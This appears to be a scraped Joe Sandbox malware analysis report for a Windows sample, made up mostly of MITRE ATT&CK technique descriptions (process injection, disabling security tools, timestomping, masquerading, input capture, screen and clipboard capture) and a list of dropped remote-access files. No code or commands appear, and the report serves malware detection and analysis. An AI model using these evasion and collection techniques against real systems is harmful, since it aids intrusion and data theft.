Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report lFxGd66yDa.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\DNScache\AudioCapture.dll

C:\Users\user\AppData\Local\DNScache\HTCTL32.DLL

C:\Users\user\AppData\Local\DNScache\NSM.LIC

C:\Users\user\AppData\Local\DNScache\PCICHEK.DLL

C:\Users\user\AppData\Local\DNScache\PCICL32.DLL

C:\Users\user\AppData\Local\DNScache\TCCTL32.DLL

C:\Users\user\AppData\Local\DNScache\client32.exe

C:\Users\user\AppData\Local\DNScache\client32.ini

C:\Users\user\AppData\Local\DNScache\msauserext.dll

C:\Users\user\AppData\Local\DNScache\mscat32.dll

C:\Users\user\AppData\Local\DNScache\mscpx32r.dLL

C:\Users\user\AppData\Local\DNScache\mscpxl32.dLL

Windows Analysis Report
lFxGd66yDa.exe

Function 00191A80 Relevance: 96.8, APIs: 20, Strings: 35, Instructions: 535
memoryregistrystringCOMMON

Function 00191420 Relevance: 51.0, APIs: 22, Strings: 7, Instructions: 294
memorysleepprocessCOMMON

Function 00191000 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 343
memorystringCOMMON

Function 001925B0 Relevance: 19.6, APIs: 13, Instructions: 108
memorynetworkfileCOMMON

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre